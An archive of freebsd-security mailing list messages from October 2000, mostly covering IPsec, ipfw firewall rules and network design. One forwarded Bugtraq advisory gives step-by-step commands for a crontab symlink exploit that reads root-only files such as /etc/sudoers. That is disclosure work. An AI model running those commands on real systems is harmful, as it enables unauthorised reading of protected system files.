by hub.freebsd.org (Postfix) with ESMTP id 0D32937B479 for ; Wed, 25 Oct 2000 09:41:32 -0700 (PDT) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id e9PGgVL51266; Wed, 25 Oct 2000 09:42:31 -0700 (PDT) (envelope-from kris) Date: Wed, 25 Oct 2000 09:42:31 -0700 From: Kris Kennaway To: Andrey Rouskol Cc: freebsd-security@FreeBSD.ORG Subject: Re: ipsec and ipfw Message-ID: <20001025094231.A51227@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from anry@sovintel.ru on Wed, Oct 25, 2000 at 07:32:58PM +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 25, 2000 at 07:32:58PM +0400, Andrey Rouskol wrote: > I've found that in -current outgoing ipsec-packets (esp, ah) pass > without been filtered by ipfw and incoming deencapsulated traffic is not > filtered by ipfw too. So telnet connection over ipsec with statefull > filtering is dropped in 20 seconds (which is dyn_syn_lifetime). All tests > was made in 'transport' mode. Is this normal ? Please show us your ipsec configuration and ipfw rules. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 25 9:57:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from obelix.rby.hk-r.se (obelix-b.rby.hk-r.se [194.47.132.4]) by hub.freebsd.org (Postfix) with ESMTP id 115B537B479 for ; Wed, 25 Oct 2000 09:57:19 -0700 (PDT) Received: from orc.rby.hk-r.se (orc [194.47.134.179]) by obelix.rby.hk-r.se (8.10.2/8.10.2) with ESMTP id e9PGvgK08368 for ; Wed, 25 Oct 2000 18:57:42 +0200 (MEST) Received: from localhost (t98pth@localhost) by orc.rby.hk-r.se (8.10.2/8.10.2) with ESMTP id e9PGvGM20197 for ; Wed, 25 Oct 2000 18:57:16 +0200 (MET DST) Date: Wed, 25 Oct 2000 18:57:16 +0200 (MET DST) From: =?ISO-8859-1?Q?P=E4r_Thoren?= To: freebsd-security@freebsd.org Subject: Firewall Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! I want to protect a network with a firewall. The network is xx.xx.xx.0 and has a gateway at xx.xx.xx.1 dns servers are xx.xx.xx.2 and xx.xx.xx.3 How can I protect the network with a fbsd firewall? Do I use bridge/firewall or do I set fbsd as a router/firewall "behind" the gateway xx.xx.xx.1 ? Big Bad Internet | ___|__ | | | gw | |______| | ___|__ | | Acting as bridge? router? with ipfw | fbsd | |______| | _____|_____ | | Network including the dns servers | .2-.255 | |___________| To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 25 11: 7:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.sovintel.ru (ns.sovintel.ru [212.44.130.6]) by hub.freebsd.org (Postfix) with ESMTP id 2B5A037B479 for ; Wed, 25 Oct 2000 11:07:12 -0700 (PDT) Received: from anry (fw-nat.sovintel.net [212.44.130.15]) by ns.sovintel.ru (8.9.3/8.9.3) with ESMTP id WAA19018; Wed, 25 Oct 2000 22:05:50 +0400 (MSD) Date: Wed, 25 Oct 2000 22:06:16 +0400 (MSD) From: Andrey Rouskol To: Kris Kennaway Cc: freebsd-security@FreeBSD.ORG Subject: Re: ipsec and ipfw In-Reply-To: <20001025094231.A51227@citusc17.usc.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 25 Oct 2000, Kris Kennaway wrote: > On Wed, Oct 25, 2000 at 07:32:58PM +0400, Andrey Rouskol wrote: > > > I've found that in -current outgoing ipsec-packets (esp, ah) pass > > without been filtered by ipfw and incoming deencapsulated traffic is not > > filtered by ipfw too. So telnet connection over ipsec with statefull > > filtering is dropped in 20 seconds (which is dyn_syn_lifetime). All tests > > was made in 'transport' mode. Is this normal ? > > Please show us your ipsec configuration and ipfw rules. Configs below. Rule 261 has counters from test time - it is not updated during ping. # ping 10.1.1.225 PING 10.1.1.225 (10.1.1.225): 56 data bytes 64 bytes from 10.1.1.225: icmp_seq=0 ttl=253 time=4.837 ms 64 bytes from 10.1.1.225: icmp_seq=1 ttl=253 time=4.482 ms 64 bytes from 10.1.1.225: icmp_seq=2 ttl=253 time=4.454 ms ^C --- 10.1.1.225 ping statistics --- 3 packets transmitted, 3 packets received, 0% packet loss round-trip min/avg/max/stddev = 4.454/4.591/4.837/0.174 ms ipfw show: 00100 31184 24875678 allow ip from any to any via lo0 00100 0 0 allow ip from any to any via lo0 00200 0 0 deny ip from any to 127.0.0.0/8 00200 0 0 deny ip from any to 127.0.0.0/8 00250 0 0 allow log esp from any to 10.1.1.225 out 00251 4643 523472 allow log esp from 10.1.1.225 to any in 00252 0 0 allow ah from any to 10.1.1.225 00253 583 63244 allow ah from 10.1.1.225 to any 00260 3 252 allow log ip from any to 10.1.1.225 out 00261 10 1480 deny log ip from 10.1.1.225 to any in 00300 0 0 check-state 00350 28590 1433158 deny log tcp from any to any established 00800 375543 233329232 allow tcp from any to any keep-state out 00900 10345 968766 allow tcp from any to any 23,21 keep-state in 01000 5077 1427628 allow tcp from any to any 6000 keep-state in 01100 1917883 161015900 allow icmp from any to any 09000 6049 871798 allow udp from any to any 53 keep-state out 09100 0 0 allow log udp from any to any 69 in 09200 48 2682 allow log udp from any to any keep-state out 10000 101386 11335729 deny udp from any to any 10100 10 680 deny log ip from any to any 65535 0 0 deny ip from any to any ## Dynamic rules: .... --------- setkey -c input: flush ; spdflush ; add 10.2.1.239 10.1.1.225 esp 0x10001 -E des-cbc "ESP with" -A hmac-md5 "authentication!!" ; add 10.1.1.225 10.2.1.239 esp 0x10002 -E des-cbc "ESP with" -A hmac-md5 "authentication!!" ; spdadd 10.2.1.239/32 10.1.1.225/32 any -P out ipsec esp/transport/10.2.1.239-10.1.1.225/require ; spdadd 10.1.1.225/32 10.2.1.239/32 any -P in ipsec esp/transport/10.1.1.225-10.2.1.239/require ; ------- dmesg output: ipfw: 251 Accept P:50 10.1.1.225 10.2.1.239 in via fxp0 ipfw: 251 Accept P:50 10.1.1.225 10.2.1.239 in via fxp0 ipfw: 260 Accept ICMP:8.0 10.2.1.239 10.1.1.225 out via fxp0 ipfw: 251 Accept P:50 10.1.1.225 10.2.1.239 in via fxp0 ipfw: 260 Accept ICMP:8.0 10.2.1.239 10.1.1.225 out via fxp0 ipfw: 251 Accept P:50 10.1.1.225 10.2.1.239 in via fxp0 ipfw: 260 Accept ICMP:8.0 10.2.1.239 10.1.1.225 out via fxp0 ipfw: 251 Accept P:50 10.1.1.225 10.2.1.239 in via fxp0 > > Kris > Regards, Andrey. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 25 11:37:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from maile.telia.com (maile.telia.com [194.22.190.16]) by hub.freebsd.org (Postfix) with ESMTP id 98A3E37B479 for ; Wed, 25 Oct 2000 11:37:32 -0700 (PDT) Received: from ents02 (t1o90p104.telia.com [195.67.216.104]) by maile.telia.com (8.9.3/8.9.3) with SMTP id UAA23259; Wed, 25 Oct 2000 20:37:25 +0200 (CEST) From: "James Wilde" To: =?iso-8859-1?B?UORyIFRob3Jlbg==?= , Subject: RE: Firewall Date: Wed, 25 Oct 2000 20:37:59 +0200 Message-ID: <000601c03eb2$b2f67150$8208a8c0@iqunlimited.net> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 In-Reply-To: Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Pär Thoren > Sent: Wednesday, October 25, 2000 18:57 > To: freebsd-security@FreeBSD.ORG > Subject: Firewall > > > > Hi! > > I want to protect a network with a firewall. The network is > xx.xx.xx.0 and has a gateway at xx.xx.xx.1 > dns servers are xx.xx.xx.2 and xx.xx.xx.3 > > How can I protect the network with a fbsd firewall? Do I use > bridge/firewall or do I set fbsd as a router/firewall "behind" the gateway > xx.xx.xx.1 ? Hej Pär: Why would you want to expose your gateway to the BBI? In the first place it has an intimate relationship with the hosts on your network, .2-.255 so a compromised gateway is halfway to a compromised network. In the second place, in the diagram you have drawn, it is not even on the same network. Your gateway could not have the number .1 and still be accessible from the network since there is no direct route from, say, .2 to .1. From what I have been able to learn - others may come in and correct me - your diagram could look something like this: > Big Bad Internet > | > ___|__ > | fbsd | > | fw/gw| > |______| > | > | > _____|_____ > | | Network including the dns servers > | .2-.255 | > |___________| > An even better alternative might be: > Big Bad Internet > | R---------- smtp, public DNS > ___|___ > | fbsd | > | fw/gw | > |_______| > | > |---[DMZ]------- Internet Service Lan (mail, www, etc) > ___|___ > | fbsd | > | fw/gw | |___.1__| > | > _____|_____ > | | Network including the dns servers > | .2-.255 | > |___________| > Some people, with tight budgets, hang the IS Lan directly off a third NIC in the outer firewall and scrap the inner firewall. Some suggestions: Seal your smtp/DNS servers with, say, IP-Filter configured for minimal services (25, 53, maybe 22 and ntp) and switch off pretty well all daemons. Seal your outer firewall the same way, although you will need to let in more services, at least to the IS Lan. Decide where your .2-.255 network will go for its external contacts, to a proxy on the inner firewall or the IS Lan or direct to the BBI and configure the IP-Filter in the inner wall in accordance with that. If you want me to take this in Swedish off-line, say the word. mvh/regards James To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 25 11:42:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from maile.telia.com (maile.telia.com [194.22.190.16]) by hub.freebsd.org (Postfix) with ESMTP id 253BF37B4D7 for ; Wed, 25 Oct 2000 11:42:33 -0700 (PDT) Received: from ents02 (t1o90p104.telia.com [195.67.216.104]) by maile.telia.com (8.9.3/8.9.3) with SMTP id UAA26367; Wed, 25 Oct 2000 20:42:31 +0200 (CEST) From: "James Wilde" To: =?iso-8859-1?B?UORyIFRob3Jlbg==?= , Subject: RE: Firewall Date: Wed, 25 Oct 2000 20:43:05 +0200 Message-ID: <000701c03eb3$6932aa10$8208a8c0@iqunlimited.net> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 In-Reply-To: Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Pär Thoren > Sent: Wednesday, October 25, 2000 18:57 > To: freebsd-security@FreeBSD.ORG > Subject: Firewall > > > > Hi! > > I want to protect a network with a firewall. The network is > xx.xx.xx.0 and has a gateway at xx.xx.xx.1 > dns servers are xx.xx.xx.2 and xx.xx.xx.3 I should have said that I am assuming these dns servers are private, that is purely for the use of name resolution on the internal network. Received wisdom maintains that public dns servers, along with smtp servers should be on the outside as a result of weaknesses in the protocols. This may have changed with more modern versions of the standard daemons. mvh/regards James To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 25 15:34: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from icebox.venux.net (icebox.venux.net [216.120.166.10]) by hub.freebsd.org (Postfix) with ESMTP id 3B81D37B479 for ; Wed, 25 Oct 2000 15:34:06 -0700 (PDT) Received: from thunder.venux.net (net-216-93-125-061.hcv.com [216.93.125.61]) by icebox.venux.net (Postfix) with ESMTP id C73EC26209 for ; Wed, 25 Oct 2000 18:43:50 -0400 (EDT) Message-Id: <5.0.0.25.2.20001025174629.02b0fbd0@pop3.venux.net> X-Sender: mhagerty@pop3.venux.net X-Mailer: QUALCOMM Windows Eudora Version 5.0 Date: Wed, 25 Oct 2000 18:33:55 -0400 To: freebsd-security@FreeBSD.ORG From: Matthew Hagerty Subject: IPsec requires FreeBSD-4.?? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Greetings, I am trying desperately to get a simple network-to-network VPN working with FreeBSD. I am having no luck and would like to know what version of 4.x I need? I am currently using 4.0 release on both sides. Is that going to work or do I need to upgrade to 4.1.1 or something? Also, while I'm here, this is the whole procedure I'm using (that does not seem to be working.) Is there something wrong with this? In the kernel I added these and recompiled: options IPSEC options IPSEC_ESP Then I modified the IPv4 tunnel example in the handbook (the example as written did not work either... long lines wrap) 10.0.0.0/24--24.7.242.61<------->216.93.125.61--10.0.1.0/24 setkey -c <; Wed, 25 Oct 2000 16:45:17 -0700 (PDT) Received: from chimp (fcage [192.168.0.2]) by cage.simianscience.com (8.11.1/8.9.3) with ESMTP id e9PNjh922232; Wed, 25 Oct 2000 19:45:52 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20001025194015.04b93008@mail.sentex.net> X-Sender: mdtancsa@mail.sentex.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Wed, 25 Oct 2000 19:44:58 -0400 To: Matthew Hagerty , freebsd-security@FreeBSD.ORG From: Mike Tancsa Subject: Re: IPsec requires FreeBSD-4.?? In-Reply-To: <5.0.0.25.2.20001025174629.02b0fbd0@pop3.venux.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 06:33 PM 10/25/2000 -0400, Matthew Hagerty wrote: >Greetings, > >I am trying desperately to get a simple network-to-network VPN working >with FreeBSD. I am having no luck and would like to know what version of >4.x I need? I am currently using 4.0 release on both sides. Is that >going to work or do I need to upgrade to 4.1.1 or something? It certainly is easier with 4.1.1 as you can use the racoon port. Here is a quick sample config that will work with racoon out of the box This assumed that 172.16.1.1 and 192.168.1.1 are your public NON RFC 1918 space that is publically routed #!/bin/sh #Ottawa config ifconfig lo0 10.1.2.1 netmask 255.255.255.0 alias gifconfig gif0 172.16.1.1 192.168.1.1 ifconfig gif0 inet 10.1.2.1 10.1.1.1 netmask 255.255.255.0 setkey -FP setkey -F setkey -c <Also, while I'm here, this is the whole procedure I'm using (that does not >seem to be working.) Is there something wrong with this? > >In the kernel I added these and recompiled: > >options IPSEC >options IPSEC_ESP Looks good to me. -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 25 21:20:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtprelay3.abs.adelphia.net (unknown [64.8.20.11]) by hub.freebsd.org (Postfix) with ESMTP id CA0CF37B479 for ; Wed, 25 Oct 2000 21:20:18 -0700 (PDT) Received: from warpig ([24.48.166.41]) by smtprelay3.abs.adelphia.net (Netscape Messaging Server 4.15) with SMTP id G30S0F00.DMT; Thu, 26 Oct 2000 00:19:27 -0400 Message-ID: <002d01c03f06$18b2d260$29a63018@bur.adelphia.net> From: "Andrew Penniman" To: "Mike Hoskins" , References: Subject: Re: request for example rc.firewall script Date: Thu, 26 Oct 2000 00:34:57 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Tue, 24 Oct 2000, Crist J . Clark wrote: > > > > check-state > > > allow ip from a.b.c.d to any keep-state > > > allow ip from x.y.z.z/24 to any keep-state > > Eep! You've left yourself _very_ vulnerable to spoofing. > > From the internal net you mean? If so, I agree. Given I'm the only > person using my 'LAN', I've accepted that as a liveable risk. ;) The spoofing threat is external. An evil bad person could spoof your external IP and have full access to your services by the first rule. They could do the same by spoofing any of the x.y.z.z/24 addresses. Why would your external IP be talking to the internal system? I think I'd get rid of that rule completely. To prevent spoofing on the x.y.z.z/24 network, add the following rule to prevent x.y.z.z/24 sourced traffic coming into the machine from the ouside world: deny ip from x.y.z.z/24 to any via xx0 in where xx0 is your external interface. No? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 25 23:37:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 7631A37B479 for ; Wed, 25 Oct 2000 23:37:45 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Wed, 25 Oct 2000 23:36:05 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e9Q6bIh30185; Wed, 25 Oct 2000 23:37:18 -0700 (PDT) (envelope-from cjc) Date: Wed, 25 Oct 2000 23:37:17 -0700 From: "Crist J . Clark" To: Andrew Penniman Cc: Mike Hoskins , freebsd-security@FreeBSD.ORG Subject: Re: request for example rc.firewall script Message-ID: <20001025233717.Y75251@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <002d01c03f06$18b2d260$29a63018@bur.adelphia.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <002d01c03f06$18b2d260$29a63018@bur.adelphia.net>; from apenniman@adelphia.net on Thu, Oct 26, 2000 at 12:34:57AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Oct 26, 2000 at 12:34:57AM -0400, Andrew Penniman wrote: > > On Tue, 24 Oct 2000, Crist J . Clark wrote: > > > > > > check-state > > > > allow ip from a.b.c.d to any keep-state > > > > allow ip from x.y.z.z/24 to any keep-state > > > Eep! You've left yourself _very_ vulnerable to spoofing. > > > > From the internal net you mean? If so, I agree. Given I'm the only > > person using my 'LAN', I've accepted that as a liveable risk. ;) > > The spoofing threat is external. An evil bad person could spoof your > external IP and have full access to your services by the first rule. They > could do the same by spoofing any of the x.y.z.z/24 addresses. > > Why would your external IP be talking to the internal system? I think I'd > get rid of that rule completely. > > To prevent spoofing on the x.y.z.z/24 network, add the following rule to > prevent x.y.z.z/24 sourced traffic coming into the machine from the ouside > world: > > deny ip from x.y.z.z/24 to any via xx0 in > > where xx0 is your external interface. > > No? I think, allow ip from a.b.c.d to any keep-state out allow ip from x.y.z.z/24 to any keep-state in via yy0 Where yy0 is the internal interface, is better. Go for the explicit pass, default deny. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 26 2:40:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from snafu.adept.org (adsl-63-201-63-44.dsl.snfc21.pacbell.net [63.201.63.44]) by hub.freebsd.org (Postfix) with ESMTP id 9310037B4C5 for ; Thu, 26 Oct 2000 02:40:54 -0700 (PDT) Received: by snafu.adept.org (Postfix, from userid 1000) id DE2A19EE01; Thu, 26 Oct 2000 02:40:30 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by snafu.adept.org (Postfix) with ESMTP id DC20B9B001; Thu, 26 Oct 2000 02:40:30 -0700 (PDT) Date: Thu, 26 Oct 2000 02:40:30 -0700 (PDT) From: Mike Hoskins To: cjclark@alum.mit.edu Cc: Andrew Penniman , freebsd-security@FreeBSD.ORG Subject: Re: request for example rc.firewall script In-Reply-To: <20001025233717.Y75251@149.211.6.64.reflexcom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 25 Oct 2000, Crist J . Clark wrote: > > To prevent spoofing on the x.y.z.z/24 network, add the following rule to > > prevent x.y.z.z/24 sourced traffic coming into the machine from the ouside > > world: > > > > deny ip from x.y.z.z/24 to any via xx0 in That's rule 65535. ;) > allow ip from a.b.c.d to any keep-state out > allow ip from x.y.z.z/24 to any keep-state in via yy0 > Where yy0 is the internal interface, is better. Go for the explicit > pass, default deny. Thanks, this is what I needed. I'd submitted my rules for inspection before without much feedback, I'm glad this came up again. :) -mrh To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 26 4:28:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from server.osny.com.br (osny.com.br [200.215.110.57]) by hub.freebsd.org (Postfix) with ESMTP id 0E3CD37B479 for ; Thu, 26 Oct 2000 04:28:30 -0700 (PDT) Received: from osny.com.br ([172.20.185.22]) by server.osny.com.br (8.10.1/8.10.1) with ESMTP id e9QBU6l10124 for ; Thu, 26 Oct 2000 09:30:08 -0200 (EDT) Message-ID: <39F7FAD8.2140D3F2@osny.com.br> Date: Thu, 26 Oct 2000 09:35:20 +0000 From: Michelangelo Pisa Organization: Agencia Maritima Osny X-Mailer: Mozilla 4.7 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: out of domain Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello! My Procmail is used to filter mails in my Intranet, it's ok, but if I receive some mail of the other server or domain It don't had effect, the virus come normal, not filtered, Maybe, can be my sendmail.cf configuration ? Thanks To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 26 5: 3:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id D63A137B4C5 for ; Thu, 26 Oct 2000 05:03:30 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13olka-0008UE-00; Thu, 26 Oct 2000 14:03:16 +0200 Date: Thu, 26 Oct 2000 14:03:16 +0200 (IST) From: Roman Shterenzon To: Michelangelo Pisa Cc: freebsd-security@FreeBSD.ORG Subject: Re: out of domain In-Reply-To: <39F7FAD8.2140D3F2@osny.com.br> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 26 Oct 2000, Michelangelo Pisa wrote: > > Hello! > > > My Procmail is used to filter mails in my Intranet, it's ok, but > if I receive some mail of the other server or domain It don't had > effect, the virus come normal, not filtered, Maybe, can be my > sendmail.cf configuration ? I once used FEATURE(mailertable) and uucp-domain hooks to filter that. uux reference in configuration was replaced with a simple script that done virus-checking and then reinjected it. Beware of mail loops though. I'm pretty sure there're better ways of doing it. --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 26 5:36:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from gwdu42.gwdg.de (gwdu42.gwdg.de [134.76.10.26]) by hub.freebsd.org (Postfix) with ESMTP id 41A2737B479 for ; Thu, 26 Oct 2000 05:36:45 -0700 (PDT) Received: from gwdu20.gwdg.de ([134.76.98.2] ident=kheuer) by gwdu42.gwdg.de with smtp (Exim 3.14 #18) id 13omGg-0005h9-00 for freebsd-security@freebsd.org; Thu, 26 Oct 2000 14:36:26 +0200 Received: from localhost by gwdu20.gwdg.de (5.65v4.0/1.1.10.5/11Feb98-0154PM) id AA28315; Thu, 26 Oct 2000 14:36:25 +0200 Date: Thu, 26 Oct 2000 14:36:25 +0200 (MET DST) From: Konrad Heuer To: freebsd-security@freebsd.org Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability (fwd) Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Exploit below could be reproduced on 4.1-R and Compaq Tru64 UNIX 4.0D; seems to depend on the way vi stores edit info in /tmp. Exploit does not work with emacs, e.g. I removed suid bit of crontab as a workaround. Its not possible for a user to modify files owned by someone else in this way. Regards K. Heuer (kheuer@gwdg.de) ---------- Forwarded message ---------- Date: Wed, 25 Oct 2000 12:30:47 +0200 From: "Fabio Pietrosanti (naif)" Reply-To: naif@inet.it To: BUGTRAQ@SECURITYFOCUS.COM Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability Resent-Date: Thu, 26 Oct 2000 14:17:27 +0200 (MET DST) Resent-From: Eckhard Handke Resent-To: Konrad Heuer Resent-Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability Tested also on: FreeBSD 3.3 = Vulnerable FreeBSD 2.2.8 = Vulnerable Aix 4.2 = Not Vulnerable Linux Slackware 7.0 = Not Vulnerable Linux Slackware 4.0 = Not Vulnerable naif On Tue, 24 Oct 2000, Sergey Nenashev wrote: > Hi, > > Tested on > 4.0-RELEASE FreeBSD 4.0-RELEASE #9 > 4.1-RELEASE FreeBSD 4.1-RELEASE #1: > > > Can read any file wich start with comment simbol (#) > > > > $ ls -l /etc/sudoers > -r-------- 1 root wheel 313 24 oct 20:20 /etc/sudoers > $ id > uid=1002(alf) gid=1002(alf) groups=1002(alf) > > > $ crontab -e > ~ > ~ > ~ > /tmp/crontab.hLmjTbK417 > :!sh > > [ #### Make simbolik link] > > rm /tmp/crontab.hLmjTbK417 > > ln -sf /etc/sudoers /tmp/crontab.hLmjTbK417 > > exit > > [ #### quit vi ] > /tmp/crontab.hLmjTbK417 > crontab: installing new crontab > > [ #### start crontab editor] > > $ crontab -e > [####### See in vi] > # sudoers file. > # > # This file MUST be edited with the 'visudo' command as root. > # > # See the sudoers man page for the details on how to write a sudoers > file. > # > > # Host alias specification > > # User alias specification > > # Cmnd alias specification > > # User privilege specification > root ALL=(ALL) ALL > alf ALL=(ALL) ALL > ~ > ~ > ~ > > > > > If file started with no # then crontab sad > > "/tmp/crontab.GAeNMP1357":2: bad minute > crontab: errors in crontab file, can't install > > > > > -- > ------ > Alf Delems > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 26 16:59: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from roble.com (mx2.roble.com [206.40.34.15]) by hub.freebsd.org (Postfix) with ESMTP id 74E7A37B479 for ; Thu, 26 Oct 2000 16:58:56 -0700 (PDT) Received: from localhost (marquis@localhost) by roble.com with ESMTP id e9QNwtU21687 for ; Thu, 26 Oct 2000 16:58:55 -0700 (PDT) Date: Thu, 26 Oct 2000 16:58:55 -0700 (PDT) From: Roger Marquis To: security@FreeBSD.ORG Subject: Re: request for example rc.firewall script In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Peter Brezny [mailto:peter@sysadmin-inc.com] wrote: > I'm working on adding the rules needed to rc.firewall under the 'simple' > sections to allow the script to function as a firewall/nat router for a > small network with private ip's in the 10.x.x.x range. You may or may not want to use the rc.firewall scripts directly. We more often roll our own, as a matter of due diligence, and use rc.local to call a script like the following. #!/bin/sh - /sbin/ipfw -q flush ## outgoing /sbin/ipfw add 110 allow ip from 10.1.1.0/24 to any via ed2 /sbin/ipfw add 110 allow ip from 204.69.218.85/32 to any via ed1 ## localhost /sbin/ipfw add 120 allow all from any to any via lo0 /sbin/ipfw add 121 deny ip from any to 127.0.0.0/8 /sbin/ipfw add 122 deny ip from 127.0.0.0/8 to any ## netbios /sbin/ipfw add 130 deny udp from any to any 135-139 /sbin/ipfw add 130 deny tcp from any to any 135-139 ############################################################### BLKHL=/usr/local/etc/blackhole_ips if [ -s $BLKHL ]; then for ip in `egrep -v '(^$|^#)' $BLKHL` ; do /sbin/ipfw add 1000 deny ip from $ip to any done else echo "ERROR: $BLKHL not found" fi ############################################################### ## rfc1918 /sbin/ipfw add 8998 deny ip from 10.0.0.0/8 to any /sbin/ipfw add 8998 deny ip from 172.16.0.0/12 to any /sbin/ipfw add 8998 deny ip from 192.168.0.0/16 to any /sbin/ipfw add 8998 deny ip from 128.0.0.0/16 to any ## ip-options (per FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options) /sbin/ipfw add 9000 deny log ip from any to any ipoptions ssrr,lsrr,ts,rr ## icmp types /sbin/ipfw add 9800 allow icmp from any to any icmptypes 